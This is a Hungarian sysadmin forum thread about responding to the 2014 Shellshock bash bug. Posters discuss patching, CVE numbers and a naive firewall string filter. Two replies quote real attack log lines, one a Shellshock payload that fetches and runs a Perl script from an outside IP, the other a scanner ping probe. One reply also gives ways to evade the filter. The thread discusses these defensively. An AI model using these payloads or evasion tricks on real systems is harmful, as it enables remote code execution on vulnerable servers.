- A hozzászóláshoz be kell jelentkezni
Hozzászólások
Fun fact: az első patch, illetve annak javítása sem elég a sebezhetőség befoltozásához. Az én opcióm: ellenőriztem, telepítettem és várom a következőt.
- A hozzászóláshoz be kell jelentkezni
+1.
Naponta apt-get update ill. yum update, es argus szemekkel figyelem, hoyg bash van-e kozte.
- A hozzászóláshoz be kell jelentkezni
(*) A BsaaS alapú rendszereken ellenőriztem, a többinél extra teherbírású rugós felfüggesztéseket alkalmaztam alacsony viszkozitású kenőanyaggal.
- A hozzászóláshoz be kell jelentkezni
én magas a viszkozitásra esküszöm ;)
- A hozzászóláshoz be kell jelentkezni
Köszi, hogy felhívtad erre a figyelemem. Az első patch-et még aznap feltettem amikor kikerült a hír a HUP-ra, de láttam, hogy érkeztek további bash update-k. Ezek szerint várhatóan ez még egy darabig így marad, amíg az előkerült lyukakat befoltozzák.
Csaba
- A hozzászóláshoz be kell jelentkezni
Csak saját használatú rendszereken (saját, munkahelyi, vps) van bash, így azokon a gyártó (Ubuntu, Debian, Arch) által biztosított update-eket felpakoltam, és kész.
--
arch,debian,windows,android
dev: http://goo.gl/7Us0GN
BCI news: http://goo.gl/fvFM9C
- A hozzászóláshoz be kell jelentkezni
Van egy vps-em, oda felment a frissítés, és igazából ennyit tudok a dologról. Sajnos nem értek annyira hozzá amennyire szeretnék, és néhány stackexchange beszélgetésen kívül nem igazán találtam olyan leírást, ami nem a pánikkeltésről szól, vagy nem olyanoknak, akik ezen a szakterületen mozognak, szóval fogalmam sincs, hogy egyáltalán lett volna okom aggódni, vagy mi lett volna, ha nem frissítek.
- A hozzászóláshoz be kell jelentkezni
Zahy írt róla itt a hupon, szerintem érthetően.
- A hozzászóláshoz be kell jelentkezni
ellenőriztem, hogy a felügyeletem alatt lévő rendszerek érintettek-e, patcheltem (gyártó/szolgáltató által biztosított módon ÉS kézimunka)
"Jegyezze fel a vádhoz - utasította Metcalf őrnagy a tizedest, aki tudott gyorsírni. - Tiszteletlenül beszélt a feljebbvalójával, amikor nem pofázott közbe."
- A hozzászóláshoz be kell jelentkezni
+1
--
A gyors gondolat többet ér, mint a gyors mozdulat.
- A hozzászóláshoz be kell jelentkezni
" felügyeletem alatt lévő rendszerek érintettek-e"
Fene tudja, felügyeletem alatt vannak e...
- A hozzászóláshoz be kell jelentkezni
A szerver előtti tűzfalra L7-be --> (/bin/bash -c), ráirányuló forgalom esetén DROP.
- A hozzászóláshoz be kell jelentkezni
Ez megvéd HTTPS-en keresztül is?
Megvéd elkódolt URL esetén is?
Megvéd akkor is ha nem az URL-ben megy a sztring (GET) hanem POST-ban?
- A hozzászóláshoz be kell jelentkezni
Https nincs. Az eddigi támadási kísérleteket megfogta. Az eddigi támadások ilyenformán néztek ki: "GET /cgi-bin/hi HTTP/1.0" 404 208 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /
tmp/ji http://213.5.67.223/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
- A hozzászóláshoz be kell jelentkezni
IPS megfogja...
- A hozzászóláshoz be kell jelentkezni
Uh, neked nem nagyon sikerült megérteni ennek a sebezhetőségnek a hátterét...
Még ha menne is "/bin/bash" string a hálózati forgalomban a hiba kihasználása során (de nem megy), akkor is elég lenne nálad két karakterrel kibővíteni az exploit payloadját, hogy bypassolva legyen a "védelmed": /bin/./bash
HTH
- A hozzászóláshoz be kell jelentkezni
Nem a hibát akarom javítani, nem is tudnám, hanem addig meg akarom úszni a feltörést amíg ki nem javítják. Egyébként köszi a tippet, most már marad a (bash). Lehet variálni. Ha más módszert is találok (és még nem sikeres a próba) kap az is egy szabályt. Egyébként feljebb írtam hogy nálam edig hogy próbálkoztak.
Szerk.: A wget parancsot is eltávolítottam biztos ami biztos.
- A hozzászóláshoz be kell jelentkezni
Ne tévesszen meg, hogy néhány balfasz script kiddie olyan lekéréseket küld, amiben szerepel a "/bin/bash"...
Egyébként is a feltörést így nem tudod megúszni, mivel láthatólag korábban látott mintákat próbálsz utólag kiszűrni. Itt nem működik az esemény utáni tabletta. Ha feltörhető ilyen módon a rendszered, akkor már feltörték. Most már hiába szűröd utólag.
A hiba kihasználásához meg nem kell feltétlenül a bash külön meghívása. Az erratasec scannere sem hívja meg:
[25/Sep/2014:09:20:59 +0200] "GET / HTTP/1.0" 400 305 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
A wget helyett meg szintén használhat bármi mást a támadó, ahogy a fentebbi példa is mutatja. Ha a ping megérkezik a támadóhoz, akkor tudni fogja, hogy kihasználható a hiba és előbb fogja megkerülni az L7 szűrésedet, mint te feleszmélnél a logok bogarászásából (remélem most nem állsz neki a ping stringet is szűrni, mert pont azt próbálom megértetni veled, hogy nincs értelme :).
Az olyan trükkökről már nem is beszélve, hogy a szűréseden át fognak menni a /bin/bash hívások továbbra is, ha néhány bytera fregmentált (és akár más sorrendben a géped felé továbbított) csomagokban utazik a payload.
Szóval ez a szűrés részedről csak a biztonság illúziója.
- A hozzászóláshoz be kell jelentkezni
lol ja
- A hozzászóláshoz be kell jelentkezni
Miert, van mar patch, ami az osszes eddig ismert CVE-t befoltozza? :)
-> CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187
____________________________________
Az embert 2 éven át arra tanítják hogyan álljon meg a 2 lábán, és hogyan beszéljen... Aztán azt mondják neki: -"Ülj le és kuss legyen!"..
- A hozzászóláshoz be kell jelentkezni
A francba, én eddig 5 CVE-ről tudtam :-( Lehet nyomatni, ha ismertté válnak újabbak is.
- A hozzászóláshoz be kell jelentkezni
Ez alapján már van olyan amelyik mindegyiket elvileg foltozza:
https://access.redhat.com/solutions/1207723
Bár az, hogy az elmúlt 3 napban senki nem talált újabbat még számomra nem jelenti azt, hogy nem is fognak :)
____________________________________
Az embert 2 éven át arra tanítják hogyan álljon meg a 2 lábán, és hogyan beszéljen... Aztán azt mondják neki: -"Ülj le és kuss legyen!"..
- A hozzászóláshoz be kell jelentkezni
egyéb: másik team foglalkozik ezzel.
- A hozzászóláshoz be kell jelentkezni
A kollégák, akikhez beestek ezek, tekergetik a rendszereinket. Ami saját, azt tudtommal megpeccselik (nyilván ez függvénye annak, hogy most épp van e működő patch, vagy a CVEk állnak nyerésre), ami nem a mi kezünkben van, arra ha jól tudom folyamatban van a patch releaselése.
Mondjuk minket személy szerint nem nagyon érint, azokon a nodeokon, ahol tömegeknek van shellje ott eleve egy restricted shell van, és nem lehet remote commanddal megkerülni sshn, webes izék meg nem hivogatnak ilyesmit CGIn. Igazából szerintem egy kissé túl van ez lihegve sok esetben.
- A hozzászóláshoz be kell jelentkezni
A tamogatott rendszereket kizarolag a gyarto altal biztositott modon patchelem a teljes erteku tamogatas megorzese erdekeben, a mar nem tamogatott/outdated rendszereket megprobalom eloszor kulso (megbizhato) 3rdparty csomagokkal frissiteni, ha nem megy, akkor "kezzel" megpatchelem (de ilyenkor is probalok a rendszer csomagkezelojevel egyuttmukodni).
--
Ki oda vágyik, hol száll a galamb, elszalasztja a kincset itt alant:
()=()
('Y') Blog | @hron84
C . C Üzemeltető macik
()_()
- A hozzászóláshoz be kell jelentkezni
Az általam felügyelt rendszerek egy részéhez már nem jönnek biztonsági javítások ki.
Jó lenne rendszert frissíteni valamikor, de mivel több éve nem sikerült ehhez időpontot egyeztetni, nem számítok arra, hogy most majd hirtelen sikerül.
- A hozzászóláshoz be kell jelentkezni
+1
- A hozzászóláshoz be kell jelentkezni
Váratlanul kiderült, hogy mostmár (a megmondóemberek szavajárása alapján) nemcsak "Microfos"/"Winfos" létezik, hanem a felborogatható árnyékszékek lajstromába "Fingux" és "fOS X" rendszerek is feliratkoztak.
- A hozzászóláshoz be kell jelentkezni
jaja, ahhahhhhaaa
- A hozzászóláshoz be kell jelentkezni
Csakhogy ami a mikrofosnal bug, az a linuxnal feature!
--
zsebHUP-ot használok!
- A hozzászóláshoz be kell jelentkezni
Ebben a konkret esetben a helyzet pont forditott
--
Ki oda vágyik, hol száll a galamb, elszalasztja a kincset itt alant:
()=()
('Y') Blog | @hron84
C . C Üzemeltető macik
()_()
- A hozzászóláshoz be kell jelentkezni
itt mást ír:
"...Pedig nem is tipikus bugról van szó, hanem csak egy nem dokumentált, elfelejtett funkcióról...."
--
"Nem akkor van baj amikor nincs baj, hanem amikor van!"
Népi bölcsesség
- A hozzászóláshoz be kell jelentkezni
Ellenőriztem, és rájöttem, hogy ez nem bug, hanem egy hasznos képessége (volt) a bash-nak...
-fs-
Az olyan tárgyakat, amik képesek az mc futtatására, munkaeszköznek nevezzük.
/usr/lib/libasound.so --gágágágá --lilaliba
- A hozzászóláshoz be kell jelentkezni